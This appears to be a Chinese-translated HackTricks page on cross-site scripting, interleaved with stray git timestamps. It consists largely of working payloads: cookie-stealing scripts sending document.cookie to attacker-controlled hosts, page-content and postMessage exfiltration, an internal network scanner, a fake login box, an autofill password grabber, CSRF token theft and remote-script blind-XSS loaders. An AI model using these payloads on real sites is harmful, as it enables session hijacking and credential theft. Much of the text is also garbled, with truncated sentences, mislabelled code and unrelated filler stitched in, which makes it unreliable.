((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー
2021-05-27 11:24:11 +00:00
2023-03-03 16:32:17 +00:00
```javascript
// It's also possible to execute JS code only with the chars: []`+!${}
```
2023-08-08 08:33:05 +00:00
## XSS常见的攻击载荷
2023-03-03 16:32:17 +00:00
2023-08-08 08:33:05 +00:00
### 多个载荷合集
2022-03-14 23:00:10 +00:00
{% content-ref url="steal-info-js.md" %}
[steal-info-js.md ](steal-info-js.md )
{% endcontent-ref %}
2023-08-08 08:33:05 +00:00
### 获取Cookie信息
2020-07-15 15:43:14 +00:00
```javascript
< img src = x onerror = this.src="http://<YOUR_SERVER_IP > /?c="+document.cookie>
< img src = x onerror = "location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie" >
< script > new Image ( ) . src = "http://<IP>/?c=" + encodeURI ( document . cookie ) ; < / script >
2021-05-27 11:59:23 +00:00
< script > new Audio ( ) . src = "http://<IP>/?c=" + escape ( document . cookie ) ; < / script >
2020-07-15 15:43:14 +00:00
< script > location . href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > document . location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > document . location . href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie < / script >
< script > document . write ( '<img src="http://<YOUR_SERVER_IP>?c=' + document . cookie + '" />' ) < / script >
< script > window . location . assign ( 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie ) < / script >
< script > window [ 'location' ] [ 'assign' ] ( 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie ) < / script >
< script > window [ 'location' ] [ 'href' ] ( 'http://<YOUR_SERVER_IP>/Stealer.php?cookie=' + document . cookie ) < / script >
< script > document . location = [ "http://<YOUR_SERVER_IP>?c" , document . cookie ] . join ( ) < / script >
< script > var i = new Image ( ) ; i . src = "http://<YOUR_SERVER_IP>/?c=" + document . cookie < / script >
< script > window . location = "https://<SERVER_IP>/?c=" . concat ( document . cookie ) < / script >
< script > var xhttp = new XMLHttpRequest ( ) ; xhttp . open ( "GET" , "http://<SERVER_IP>/?c=" % 2 Bdocument . cookie , true ) ; xhttp . send ( ) ; < / script >
< script > eval ( atob ( 'ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp' ) ) ; < / script >
< script > fetch ( 'https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net' , { method : 'POST' , mode : 'no-cors' , body : document . cookie } ) ; < / script >
2020-09-22 09:07:48 +00:00
< script > navigator . sendBeacon ( 'https://ssrftest.com/x/AAAAA' , document . cookie ) < / script >
2020-07-15 15:43:14 +00:00
```
2021-05-27 11:59:23 +00:00
{% hint style="info" %}
2023-08-08 08:33:05 +00:00
如果cookie中设置了HTTPOnly标志, , ,
2021-05-27 11:59:23 +00:00
{% endhint %}
2023-08-03 19:12:22 +00:00
### 窃取页面内容
2021-09-01 23:18:05 +00:00
```javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
var attacker = "http://10.10.14.8/exfil";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
2023-08-03 19:12:22 +00:00
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
2021-09-01 23:18:05 +00:00
}
xhr.open('GET', url, true);
xhr.send(null);
```
2023-08-03 19:12:22 +00:00
### 查找内部IP地址
2023-08-16 09:07:58 +00:00
During a penetration test, it is important to identify the internal IP addresses of the target system. This information can be useful for further exploitation and lateral movement within the network.
#### Method 1: DNS Rebinding
DNS rebinding is a technique that can be used to bypass the same-origin policy enforced by web browsers. By exploiting this vulnerability, an attacker can trick the victim's browser into making requests to internal IP addresses.
To perform DNS rebinding, follow these steps:
1. Set up a malicious website that serves JavaScript code.
2. The JavaScript code should make requests to internal IP addresses.
3. Send a link to the victim and wait for them to visit the malicious website.
4. Once the victim visits the website, their browser will make requests to the internal IP addresses specified in the JavaScript code.
5. Monitor the network traffic to identify the internal IP addresses.
#### Method 2: Server-Side Request Forgery (SSRF)
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests from the target server to arbitrary destinations. By exploiting this vulnerability, an attacker can make the target server request its own internal IP address.
To perform SSRF, follow these steps:
1. Identify a vulnerable parameter that accepts URLs as input.
2. Craft a request that includes the target server's internal IP address as the URL.
3. Send the request to the vulnerable parameter and observe the response.
2023-10-16 21:15:46 +00:00
4. If the response contains the internal IP address, it means that the target server is vulnerable to SSRF.
#### Method 3: Network Scanning
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
Network scanning is a technique that involves actively probing a network to identify live hosts and open ports. By scanning the target network, an attacker can discover internal IP addresses.
To perform network scanning, follow these steps:
1. Use a network scanning tool, such as Nmap, to scan the target network.
2. Specify the IP range to scan, including both public and private IP address ranges.
3. Analyze the scan results to identify internal IP addresses.
#### Method 4: Social Engineering
Social engineering is a technique that involves manipulating individuals to gain unauthorized access to information. By using social engineering tactics, an attacker can trick employees into revealing internal IP addresses.
To perform social engineering, follow these steps:
1. Gather information about the target organization and its employees.
2. Craft a convincing pretext, such as posing as an IT support technician.
3. Contact employees and attempt to extract internal IP addresses through conversation or phishing techniques.
By using these methods, an attacker can identify internal IP addresses, which can be used for further exploitation and lateral movement within the target network.
2021-11-26 23:32:24 +00:00
```html
< script >
var q = []
var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
var wait = 2000
var n_threads = 51
// Prepare the fetchUrl functions to access all the possible
for(i=1;i< =255;i++){
2023-08-03 19:12:22 +00:00
q.push(
function(url){
return function(){
fetchUrl(url, wait);
}
}('http://192.168.0.'+i+':8080'));
2021-11-26 23:32:24 +00:00
}
// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for(i=1; i< =n_threads; i++){
2023-08-03 19:12:22 +00:00
if(q.length) q.shift()();
2021-11-26 23:32:24 +00:00
}
function fetchUrl(url, wait){
2023-08-03 19:12:22 +00:00
console.log(url)
var controller = new AbortController(), signal = controller.signal;
fetch(url, {signal}).then(r=>r.text().then(text=>
{
location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'& code='+encodeURIComponent(text)+'& '+Date.now()
}
))
.catch(e => {
if(!String(e).includes("The user aborted a request") & & q.length) {
q.shift()();
}
});
setTimeout(x=>{
controller.abort();
if(q.length) {
q.shift()();
}
}, wait);
2021-11-26 23:32:24 +00:00
}
< / script >
```
2023-08-03 19:12:22 +00:00
### 端口扫描器 (fetch)
2023-08-08 08:33:05 +00:00
The Port Scanner is a tool used to identify open ports on a target system. It works by sending a series of network requests to different ports and analyzing the responses received. This information can be useful for identifying potential vulnerabilities or services running on the target system.
To use the Port Scanner, you need to provide the target IP address or domain name, as well as the range of ports to scan. The tool will then send requests to each port in the specified range and display the results.
Keep in mind that scanning ports without proper authorization is illegal and unethical. Always ensure that you have permission from the system owner before conducting any port scanning activities.
#### Usage
To use the Port Scanner, follow these steps:
1. Open the terminal or command prompt.
2. Navigate to the directory where the Port Scanner is located.
3. Run the following command:
```
./port-scanner.sh < target > < start-port > < end-port >
```
Replace `<target>` with the IP address or domain name of the target system.
Replace `<start-port>` and `<end-port>` with the range of ports you want to scan.
4. Wait for the scan to complete. The tool will display the open ports found on the target system.
2021-11-26 23:32:24 +00:00
2023-08-08 08:33:05 +00:00
#### Example
```
./port-scanner.sh 192.168.0.1 1 1000
```
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
This command will scan ports 1 to 1000 on the target system with the IP address 192.168.0.1.
#### Conclusion
The Port Scanner is a useful tool for identifying open ports on a target system. However, it is important to use it responsibly and with proper authorization to avoid any legal or ethical issues.
2020-07-15 15:43:14 +00:00
```javascript
const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i< 1000 ; i + + ) { checkPort ( i ) ; }
```
2023-08-03 19:12:22 +00:00
### 端口扫描器( )
2023-08-08 08:33:05 +00:00
The Port Scanner is a tool used to identify open ports on a target system. It works by sending requests to different ports and analyzing the responses received. This can help identify potential vulnerabilities or services running on the target system.
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
To use the Port Scanner, follow these steps:
2023-08-03 19:12:22 +00:00
2023-08-08 08:33:05 +00:00
1. Specify the target system's IP address or domain name.
2. Set the range of ports to scan (e.g., 1-1000).
3. Choose the scanning method (e.g., TCP, UDP).
4. Start the scan and wait for the results.
2023-08-03 19:12:22 +00:00
2023-08-08 08:33:05 +00:00
The Port Scanner will display a list of open ports along with their corresponding services, if available. This information can be useful for further analysis or exploitation.
2023-08-03 19:12:22 +00:00
2023-08-08 08:33:05 +00:00
**Note:** It is important to obtain proper authorization before conducting any port scanning activities. Unauthorized port scanning is illegal and can result in severe consequences. Always ensure you have permission from the target system owner or authorized personnel.
2020-07-15 15:43:14 +00:00
```python
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i< ports.length ; i + + ) {
2023-08-03 19:12:22 +00:00
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
2020-07-15 15:43:14 +00:00
}
```
2023-08-03 19:12:22 +00:00
_短时间表示有响应的端口_ _较长时间表示无响应_ .
2020-11-20 10:55:52 +00:00
2023-08-03 19:12:22 +00:00
在Chrome中查看被禁止的端口列表[**这里**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net\_util.cc),
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 用于请求凭据的框
2020-07-15 15:43:14 +00:00
```markup
< style > :: placeholder { color : white ; } < / style > < script > document . write ( "<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>" ) < / script >
```
2023-08-03 19:12:22 +00:00
### 自动填充密码捕获
2023-08-08 08:33:05 +00:00
#### Description
2023-08-24 09:57:53 +00:00
Auto-fill password capture is a technique used to exploit cross-site scripting (XSS) vulnerabilities in web applications. This technique takes advantage of the browser's auto-fill feature, which automatically populates form fields with saved usernames and passwords.
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
#### Vulnerability
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
When a web application fails to properly sanitize user input and does not implement proper security measures, an attacker can inject malicious code into the application. In the case of auto-fill password capture, the attacker can craft a malicious script that is executed when the user visits a compromised web page.
2023-08-08 08:33:05 +00:00
2023-08-24 09:57:53 +00:00
#### Exploitation
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
To exploit this vulnerability, the attacker creates a web page that contains a form field with a name similar to a saved password field. When the user visits this page, the browser's auto-fill feature will automatically populate the form field with the saved password. However, since the form field is actually controlled by the attacker's script, the password is captured and sent to the attacker's server.
2020-07-15 15:43:14 +00:00
2023-08-24 09:57:53 +00:00
#### Mitigation
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
To mitigate the risk of auto-fill password capture, web developers should implement proper input validation and sanitization techniques. Additionally, web application security measures such as Content Security Policy (CSP) and strict input validation can help prevent XSS attacks. Users should also be cautious when visiting unfamiliar websites and regularly update their browsers to ensure they have the latest security patches.
2020-07-15 15:43:14 +00:00
```javascript
< b > Username:< />< br >
< input name = username id = username >
< b > Password:< />< br >
< input type = password name = password onchange = "if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```
2023-08-08 08:33:05 +00:00
当在密码字段中输入任何数据时,用户名和密码将被发送到攻击者的服务器,即使客户端选择了保存的密码并且没有输入任何内容,凭证也将被窃取。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 键盘记录器
2021-05-27 13:02:25 +00:00
2023-08-24 09:57:53 +00:00
只需在GitHub上搜索, :
2021-05-27 13:02:25 +00:00
* [https://github.com/JohnHoder/Javascript-Keylogger ](https://github.com/JohnHoder/Javascript-Keylogger )
* [https://github.com/rajeshmajumdar/keylogger ](https://github.com/rajeshmajumdar/keylogger )
* [https://github.com/hakanonymos/JavascriptKeylogger ](https://github.com/hakanonymos/JavascriptKeylogger )
2023-08-24 09:57:53 +00:00
* 您还可以使用Metasploit的`http_javascript_keylogger`
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 窃取CSRF令牌
2020-07-15 15:43:14 +00:00
```javascript
< script >
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
2023-08-03 19:12:22 +00:00
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'& email=test@test.com')
2020-07-15 15:43:14 +00:00
};
< / script >
```
2023-08-03 19:12:22 +00:00
### 盗取 PostMessage 消息
2023-10-16 21:15:46 +00:00
#### 描述
PostMessage 是一种用于在不同窗口之间进行跨域通信的 API。然而, ,
#### 攻击方法
攻击者可以通过注入恶意脚本来劫持 PostMessage 消息。以下是一种常见的攻击方法:
2023-08-08 08:33:05 +00:00
2023-10-16 21:15:46 +00:00
1. 攻击者在目标网站上注入恶意脚本。
2. 恶意脚本监听 `message` 事件,以便拦截 PostMessage 消息。
3. 当目标网站的其他窗口发送 PostMessage 消息时,恶意脚本会截获并将消息发送到攻击者控制的服务器。
2023-08-08 08:33:05 +00:00
2023-10-16 21:15:46 +00:00
#### 防御方法
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
为了防止 PostMessage 消息被窃取,可以采取以下措施:
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
1. 对于接收 PostMessage 消息的窗口,应该验证消息的来源。可以使用 `event.origin` 属性来验证消息的来源是否是可信的。
2. 在发送 PostMessage 消息时,应该限制消息的目标窗口。只允许将消息发送到预期的窗口,避免将消息发送到不受信任的窗口。
3. 对于包含敏感信息的 PostMessage 消息,应该对消息进行加密,以防止被窃取。
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
#### 示例
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
以下示例演示了如何使用 PostMessage 进行跨窗口通信:
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
```javascript
// 发送 PostMessage 消息
window.postMessage('Hello, World!', 'https://example.com');
// 接收 PostMessage 消息
window.addEventListener('message', function(event) {
if (event.origin === 'https://example.com') {
console.log('Received message:', event.data);
}
});
```
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
在上述示例中,`window.postMessage` 用于发送消息,`window.addEventListener` 用于接收消息。通过验证消息的来源,可以确保只接收来自可信网站的消息。
2020-07-15 15:43:14 +00:00
```markup
< img src = "https://attacker.com/?" id = message >
< script >
2023-08-03 19:12:22 +00:00
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
2020-07-15 15:43:14 +00:00
< / script >
```
2023-08-03 19:12:22 +00:00
### 滥用服务工作者
2020-07-15 15:43:14 +00:00
2022-12-20 11:25:07 +00:00
{% content-ref url="abusing-service-workers.md" %}
[abusing-service-workers.md ](abusing-service-workers.md )
{% endcontent-ref %}
2021-10-20 00:45:58 +00:00
2023-08-16 09:07:58 +00:00
### 访问 Shadow DOM
{% content-ref url="shadow-dom.md" %}
[shadow-dom.md ](shadow-dom.md )
{% endcontent-ref %}
### Polyglots
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
2020-07-15 15:43:14 +00:00
2023-08-16 09:07:58 +00:00
### 盲 XSS 负载
2021-10-08 09:38:39 +00:00
2023-08-03 19:12:22 +00:00
您还可以使用:[https://xsshunter.com/](https://xsshunter.com)
2020-07-15 15:43:14 +00:00
```markup
">< img src = '//domain/xss' >
">< script src = "//domain/xss.js" > < / script >
>< a href = "javascript:eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" > Click Me For An Awesome Time</ a >
2020-07-30 22:31:02 +00:00
< script > function b ( ) { eval ( this . responseText ) } ; a = new XMLHttpRequest ( ) ; a . addEventListener ( "load" , b ) ; a . open ( "GET" , "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb" ) ; a . send ( ) ; < / script >
2020-07-15 15:43:14 +00:00
<!-- html5sec - Self - executing focus event via autofocus: -->
">< input onfocus = "eval('d=document; _ = d.createElement(\'script\');_ .src= \'\/\/domain/m \';d.body.appendChild(_)')" autofocus >
<!-- html5sec - JavaScript execution via iframe and onload -->
2023-08-03 19:12:22 +00:00
">< iframe onload = "eval('d=document; _=d.createElement(\'script\');_ .src= \'\/\/domain/m \';d.body.appendChild(_)')" >
2020-07-15 15:43:14 +00:00
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
">< svg onload = "javascript:eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" xmlns = "http://www.w3.org/2000/svg" ></ svg >
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags -->
">< video >< source onerror = "eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" >
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. -->
">< body onpageshow = "eval('d=document; _ = d.createElement(\'script\');_ .src= \'//domain \';d.body.appendChild(_)')" >
<!-- xsshunter.com - Sites that use JQuery -->
< script > $ . getScript ( "//domain" ) < / script >
<!-- xsshunter.com - When <script> is filtered -->
">< img src = x id = payload== onerror = eval(atob(this.id)) >
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
">< input onfocus = eval(atob(this.id)) id = payload== autofocus >
2020-07-30 22:31:02 +00:00
<!-- noscript trick -->
< noscript > < p title = "</noscript><img src=x onerror=alert(1)>" >
2020-07-15 15:43:14 +00:00
<!-- whitelisted CDNs in CSP -->
">< script src = "https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js" > < / script >
< script src = "https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js" > < / script >
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration : - ]... -->
< div ng-app ng-csp > < textarea autofocus ng-focus = "d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'" > < / textarea > < / div >
```
2023-08-08 08:33:05 +00:00
### 正则表达式 - 访问隐藏内容
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
从[**这篇文章**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay)中可以了解到, , , , :
2023-01-12 12:36:15 +00:00
```javascript
// Do regex with flag
flag="CTF{FLAG}"
re=/./g
re.test(flag);
// Remove flag value, nobody will be able to get it, right?
flag=""
// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
```
2023-08-03 19:12:22 +00:00
### 暴力破解列表
2021-06-27 21:56:13 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
2021-06-27 21:56:13 +00:00
2023-08-03 19:12:22 +00:00
## 滥用其他漏洞的XSS
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### Markdown中的XSS
2021-11-29 10:15:51 +00:00
2023-08-03 19:12:22 +00:00
可以注入Markdown代码来渲染吗? ! :
2022-05-05 23:53:10 +00:00
{% content-ref url="xss-in-markdown.md" %}
[xss-in-markdown.md ](xss-in-markdown.md )
{% endcontent-ref %}
2021-11-29 10:15:51 +00:00
2023-08-03 19:12:22 +00:00
### XSS到SSRF
2020-09-09 09:02:24 +00:00
2023-08-24 09:57:53 +00:00
在使用缓存的网站上获得了XSS? , ( ) :
2020-09-09 09:02:24 +00:00
```python
< esi:include src = "http://yoursite.com/capture" / >
```
2023-08-08 08:33:05 +00:00
使用它来绕过cookie限制、XSS过滤器等等!
2023-08-03 19:12:22 +00:00
有关此技术的更多信息,请参见:[**XSLT**](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)。
2020-09-09 09:02:24 +00:00
2023-08-03 19:12:22 +00:00
### 动态创建PDF中的XSS
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
如果一个网页使用用户控制的输入来创建PDF,
2023-08-08 08:33:05 +00:00
因此,如果**PDF创建机器人发现**某种**HTML** **标签** ,它将对其进行**解释**,您可以**滥用**这种行为来引发**服务器XSS**。
2020-12-24 09:46:40 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md ](server-side-xss-dynamic-pdf.md )
{% endcontent-ref %}
2020-12-24 09:46:40 +00:00
2023-08-03 19:12:22 +00:00
如果无法注入HTML标签, :
2020-12-24 09:46:40 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="pdf-injection.md" %}
[pdf-injection.md ](pdf-injection.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### Amp4Email中的XSS
2022-08-16 09:38:59 +00:00
2023-10-16 21:15:46 +00:00
AMP是一种技术,
2022-08-16 09:38:59 +00:00
2023-10-16 21:15:46 +00:00
[**AMP for Email** ](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/ )格式提供了[AMP组件的子集](https://github.com/ampproject/amphtml/blob/master/docs/spec/email/amp-email-components.md),
2022-08-16 09:38:59 +00:00
2023-08-24 09:57:53 +00:00
示例:[**在Gmail中的Amp4Email中的XSS漏洞**](https://adico.me/post/xss-in-gmail-s-amp4email)。
2022-08-16 09:38:59 +00:00
2023-08-03 19:12:22 +00:00
### XSS上传文件( )
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
将以下文件(来自[http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/))上传为图像:
2020-07-15 15:43:14 +00:00
```markup
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
2021-04-12 14:09:57 +00:00
2020-07-15 15:43:14 +00:00
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
< svg version = "1.1" baseProfile = "full" xmlns = "http://www.w3.org/2000/svg" >
2023-08-03 19:12:22 +00:00
< rect width = "300" height = "100" style = "fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" / >
< script type = "text/javascript" >
alert(1);
< / script >
2020-07-15 15:43:14 +00:00
< / svg >
-----------------------------232181429808--
```
2021-06-15 09:31:42 +00:00
```markup
2020-07-15 15:43:14 +00:00
< svg version = "1.1" baseProfile = "full" xmlns = "http://www.w3.org/2000/svg" >
2023-08-03 19:12:22 +00:00
< script type = "text/javascript" > alert ( "XSS" ) < / script >
2020-07-15 15:43:14 +00:00
< / svg >
```
2021-06-15 09:31:42 +00:00
```markup
2021-01-22 11:00:52 +00:00
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
< svg version = "1.1" baseProfile = "full" xmlns = "http://www.w3.org/2000/svg" >
< polygon id = "triangle" points = "0,0 0,50 50,0" fill = "#009900" stroke = "#004400" / >
< script type = "text/javascript" >
alert("XSS");
< / script >
< / svg >
```
2022-04-30 10:09:20 +00:00
```svg
< svg width = "500" height = "500"
2023-08-03 19:12:22 +00:00
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
< circle cx = "50" cy = "50" r = "45" fill = "green"
id="foo"/>
< foreignObject width = "500" height = "500" >
< iframe xmlns = "http://www.w3.org/1999/xhtml" src = "data:text/html,<body><script>document.body.style.background="red"</script>hi</body>" width = "400" height = "250" / >
< iframe xmlns = "http://www.w3.org/1999/xhtml" src = "javascript:document.write('hi');" width = "400" height = "250" / >
< / foreignObject >
2022-06-25 15:45:47 +00:00
< / svg >
2022-04-30 10:09:20 +00:00
```
2022-07-20 09:38:23 +00:00
```html
< svg > < use href = "//portswigger-labs.net/use_element/upload.php#x" / > < / svg >
```
2023-03-03 17:26:17 +00:00
```xml
< svg > < use href = "data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' ><image href='1' onerror='alert(1)' /></svg>#x" / >
```
2023-08-24 09:57:53 +00:00
在[https://github.com/allanlw/svg-cheatsheet](https://github.com/allanlw/svg-cheatsheet)中找到更多的SVG负载。
2023-03-03 17:26:17 +00:00
2023-08-03 19:12:22 +00:00
## 杂项JS技巧和相关信息
2020-07-15 15:43:14 +00:00
2023-02-07 10:56:16 +00:00
{% content-ref url="other-js-tricks.md" %}
[other-js-tricks.md ](other-js-tricks.md )
{% endcontent-ref %}
2023-08-03 19:12:22 +00:00
## XSS资源
2023-01-05 13:05:03 +00:00
2023-02-07 10:56:16 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection )
2023-03-05 22:20:47 +00:00
* [http://www.xss-payloads.com ](http://www.xss-payloads.com ) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt ](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt ) [https://github.com/materaj/xss-list ](https://github.com/materaj/xss-list )
* [https://github.com/ismailtasdelen/xss-payload-list ](https://github.com/ismailtasdelen/xss-payload-list )
2023-02-07 10:56:16 +00:00
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec ](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec )
2023-01-05 13:05:03 +00:00
* [https://netsec.expert/2020/02/01/xss-in-2020.html ](https://netsec.expert/2020/02/01/xss-in-2020.html )
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### XSS工具
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
在这里找到一些[**XSS工具**](xss-tools.md)**。**
2022-04-28 16:01:33 +00:00
2022-07-21 20:26:09 +00:00
< img src = "../../.gitbook/assets/i3.png" alt = "" data-size = "original" > \
2023-08-16 09:07:58 +00:00
**赏金猎人提示**: ,
2022-05-08 22:42:39 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2023-08-08 08:33:05 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-08-16 09:07:58 +00:00
* 你在**网络安全公司**工作吗? !
2023-10-16 21:15:46 +00:00
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
2023-08-03 19:12:22 +00:00
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组** ](https://discord.gg/hRep4RUj7f )或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **提交PR来分享你的黑客技巧。**
2022-04-28 16:01:33 +00:00
< / details >
